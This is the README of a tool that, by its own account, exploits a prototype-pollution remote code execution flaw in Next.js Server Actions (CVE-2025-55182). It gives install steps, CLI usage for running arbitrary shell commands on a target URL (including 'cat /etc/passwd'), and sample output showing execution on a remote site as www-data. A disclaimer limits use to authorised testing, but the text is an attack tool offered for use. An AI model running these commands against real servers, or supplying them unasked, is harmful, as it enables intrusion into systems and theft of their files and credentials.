
CVE-2025-55182 Herramienta de Explotación RCE para Next.js
Documento en chino | Análisis de la vulnerabilidad
[!CAUTION]
⚠️ AVISO - LEA ANTES DE USAR
Esta herramienta está destinada SOLO para:
- Investigadores de seguridad realizando verificación de vulnerabilidades
- Pruebas de penetración autorizadas con permiso explícito
- Fines educativos y de aprendizaje
El acceso no autorizado a sistemas informáticos es ILEGAL.
Al usar esta herramienta, usted acepta que:
- Ha obtenido la autorización adecuada antes de probar cualquier sistema
- No usará esta herramienta con fines maliciosos
- Es el único responsable de sus acciones y de cualquier consecuencia
El autor NO asume ninguna responsabilidad por el uso indebido de esta herramienta.
Una herramienta de explotación de ejecución remota de código (RCE) para la vulnerabilidad de contaminación de prototipos del lado del servidor de Next.js.
CVE-2025-55182 es una vulnerabilidad de seguridad crítica que afecta a Next.js y permite a atacantes lograr ejecución remota de código mediante solicitudes manipuladas que explotan la contaminación de prototipos.
📖 Para un análisis técnico detallado, consulte EXPLOIT.md
Esta vulnerabilidad explota el mecanismo de manejo de solicitudes de Server Actions de Next.js, logrando ejecución de código arbitrario a través de la contaminación de la cadena de prototipos __proto__ combinada con el constructor Function.
# Using yarn
yarn install
# Using npm
npm install
# Basic usage
node index.js <target_url> [command]
# Examples
node index.js http://localhost:3000
node index.js http://localhost:3000 "ls -la"
node index.js http://localhost:3000 "cat /etc/passwd"
# Run the tool
yarn start http://localhost:3000 "whoami"
# Or use alias
yarn exploit http://localhost:3000 "ls -la"
# Show help
yarn help
# Link globally
yarn link
# or
npm link
# Then use the command directly
cve-2025-55182 http://localhost:3000
cve-2025-55182 http://localhost:3000 "whoami"
# Unlink
yarn unlink
Usage:
cve-2025-55182 <url> [command]
Arguments:
url Target URL (required)
command Command to execute (default: whoami)
Options:
-h, --help Show help message
-v, --version Show version number
La herramienta genera resultados en formato JSON:
{
"success": true,
"message": "",
"data": "command execution result"
}
{
"success": false,
"message": "error message",
"data": null
}
$ cve-2025-55182 http://vulnerable-site.com "id"
{
"success": true,
"message": "",
"data": "uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)"
}